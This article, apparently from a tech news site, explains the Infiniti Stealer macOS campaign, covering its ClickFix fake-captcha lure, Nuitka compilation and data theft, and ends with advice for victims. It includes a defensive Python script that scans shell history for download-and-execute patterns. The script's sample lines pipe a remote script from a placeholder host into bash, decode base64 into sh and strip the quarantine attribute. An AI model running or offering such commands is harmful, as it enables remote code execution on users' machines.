Everything you need to know about the malware stealing data from Mac users
Source: Mashable Tech
Mac users have a new malware threat to watch out for. According to a report by Malwarebytes, Infiniti Stealer is a new macOS infostealer that uses social‑engineering tactics and is difficult to detect once installed.
Infiniti Stealer
The campaign begins with a social‑engineering technique known as ClickFix. Victims are typically directed to a malicious website via a phishing email or a pop‑up on a compromised page. The page displays an urgent update warning and asks the user to complete what looks like a Cloudflare human‑verification captcha; the check is fake and exists only to make the next steps feel routine.
After the standard “I am not a robot” checkbox, the page instructs the user to:
- Open Spotlight on their Mac.
- Search for the Terminal app.
- Paste a provided code snippet into Terminal and press Return.
This command downloads and executes the Infiniti Stealer payload. Because the fetch happens inside the user's own shell session, the payload never passes through the browser's download path, and a file fetched with curl in Terminal does not carry the quarantine attribute that Gatekeeper relies on to warn about unsigned downloads.
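The steps above leave a trace that defenders can look for: the pasted one-liner lands in the victim's shell history. The script below is an added example, not code from the original article or from Malwarebytes. It scans zsh extended-history or plain bash-history lines for generic ClickFix-style "download and execute" patterns (a remote script piped straight into a shell or interpreter, base64 decoded into a shell, the quarantine attribute stripped, a file in /tmp made executable). The indicator list and the sample history lines are constructed for illustration; they are not the specific command used in the Infiniti Stealer campaign, which the article does not reproduce.

```python
import os
import re
import sys
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Generic indicators of a pasted "download and execute" one-liner.
# These are constructed ClickFix-style patterns for illustration, not the
# actual command used by the Infiniti Stealer campaign.
INDICATORS = [
    ("remote-script-to-shell",
     re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    ("remote-script-to-python",
     re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(sudo\s+)?python3?\b")),
    ("base64-decode-to-shell",
     re.compile(r"base64\s+(-d|--decode|-D)\b[^|;]*\|\s*(ba|z)?sh\b")),
    ("quarantine-strip",
     re.compile(r"\bxattr\b.*com\.apple\.quarantine|\bxattr\s+-c\b")),
    ("background-detach",
     re.compile(r"\bnohup\b|\bdisown\b")),
    ("exec-from-tmp",
     re.compile(r"\bchmod\s+\+?x\s+(/tmp|/private/tmp|/var/tmp)")),
]

# zsh EXTENDED_HISTORY lines look like ": <epoch>:<elapsed>;<command>".
ZSH_EXTENDED = re.compile(r"^: (?P<ts>\d+):\d+;(?P<cmd>.*)$")


@dataclass
class Finding:
    line_no: int
    timestamp: Optional[int]   # None for plain bash_history lines
    command: str
    hits: List[str]


def parse_history_line(line: str) -> Tuple[Optional[int], str]:
    """Return (timestamp, command); timestamp is None without zsh metadata."""
    m = ZSH_EXTENDED.match(line)
    if m:
        return int(m.group("ts")), m.group("cmd")
    return None, line


def scan_history(lines, min_hits: int = 1) -> List[Finding]:
    """Flag every history line that matches at least min_hits indicators."""
    findings = []
    for n, raw in enumerate(lines, start=1):
        raw = raw.rstrip("\n")
        if not raw.strip():
            continue
        ts, cmd = parse_history_line(raw)
        hits = [name for name, rx in INDICATORS if rx.search(cmd)]
        if len(hits) >= min_hits:
            findings.append(Finding(n, ts, cmd, hits))
    return findings


# Constructed sample: three benign commands, three ClickFix-style commands.
# The host name is a reserved .invalid domain, not a real campaign domain.
SAMPLE_HISTORY = [
    ": 1718000001:0;ls -la ~/Downloads",
    ": 1718000040:0;git pull --rebase",
    ": 1718000100:0;curl -fsSL https://verify.example.invalid/check.sh | bash",
    ": 1718000160:0;echo aGVsbG8= | base64 -d | sh",
    ": 1718000200:0;xattr -d com.apple.quarantine ~/Downloads/Installer.app",
    "brew upgrade",
]


def main(argv):
    # With a path argument, scan a real history file; otherwise use the sample.
    if len(argv) > 1:
        with open(os.path.expanduser(argv[1]), errors="replace") as fh:
            lines = fh.readlines()
    else:
        lines = SAMPLE_HISTORY
    for f in scan_history(lines):
        when = f.timestamp if f.timestamp is not None else "-"
        print(f"line {f.line_no} ts={when} {','.join(f.hits)}: {f.command}")


if __name__ == "__main__":
    main(sys.argv)
```

Run it as `python3 clickfix_history_scan.py ~/.zsh_history` on a suspect machine (the interactive history is only flushed on shell exit unless INC_APPEND_HISTORY or SHARE_HISTORY is set, so close the Terminal window first or read the still-open session's scrollback). Matches are leads for triage, not proof of infection: developers legitimately pipe install scripts into bash, which is exactly why the lure feels plausible.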
“Because the user runs the command directly, many traditional defenses are bypassed. There’s no exploit, no malicious attachment, and no drive‑by download.” – Malwarebytes
The delivered malware is written in Python but compiled with Nuitka, which translates the Python source into C and builds it into a native macOS binary that carries its own Python runtime. The stealer therefore runs as a Mach‑O executable rather than as a visible .py script, detection signatures written for Python source or bytecode do not match it, and recovering the original logic takes more work than unpacking a PyInstaller‑style bundle. This is what makes the stealer harder to analyze and detect.
“To our knowledge, this is the first documented macOS campaign combining ClickFix delivery with a Nuitka‑compiled Python stealer.” – Malwarebytes
Once installed, Infiniti Stealer attempts to steal a variety of data from the victim’s Mac and upload it to the attacker’s server, including:
- Passwords
- Screenshots
- Browser data (cookies, history, etc.)
- Other sensitive information
Be aware of malware threats
- Verify website legitimacy before following any instructions, especially those that require running code in Terminal.
- No legitimate captcha or verification process should ask you to paste commands into Terminal.
- If you are not comfortable with command‑line operations, avoid any process that asks you to do so.
- If you suspect infection, stop using the affected computer immediately. Change your account passwords on a separate, clean device, and sign out of all active sessions in each account's security settings: the stealer takes browser cookies, and a stolen session cookie can keep an attacker logged in even after the password changes. Where possible, also revoke the compromised computer's access and rotate any API keys, SSH keys or tokens that were stored on it.
Infiniti Stealer reflects a growing trend of attackers targeting Apple devices, whose users often hold the mistaken belief that those devices are immune to malware. Similar threats include DarkSword, which targets iPhones and other iOS devices without requiring the user to download a malicious file.